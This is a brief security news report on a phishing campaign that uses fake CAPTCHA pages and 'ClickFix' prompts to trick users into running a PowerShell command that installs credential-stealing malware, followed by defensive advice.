The mixed use of CAPTCHA for legitimacy and ClickFix for payload delivery allows attackers to bypass conventional email security measures and directly steal credentials from victims.
How the Attack Works
Attackers are combining CAPTCHA verification pages with a technique called ‘ClickFix’ to trick users into stealing their own credentials. The campaign starts with phishing emails that contain links to fake CAPTCHA pages. When a user completes the CAPTCHA, the page triggers a ‘ClickFix’ prompt that instructs the user to copy and paste a malicious PowerShell command into a Windows Run dialog. This command then downloads and executes info-stealing malware designed to harvest credentials from browsers and email clients.
Impact and Scope
This multi-stage attack has been observed targeting users across multiple industries, with a particular focus on credential theft for financial services and enterprise login portals. The use of CAPTCHA lends a false sense of legitimacy, while the ClickFix technique bypasses traditional email security filters. No specific CVEs are linked to this campaign, but the malware variants involved are known to target saved passwords and session tokens. Users are advised to verify email sources and avoid running commands from unknown CAPTCHA or popup prompts.
Source: Cyber Security News
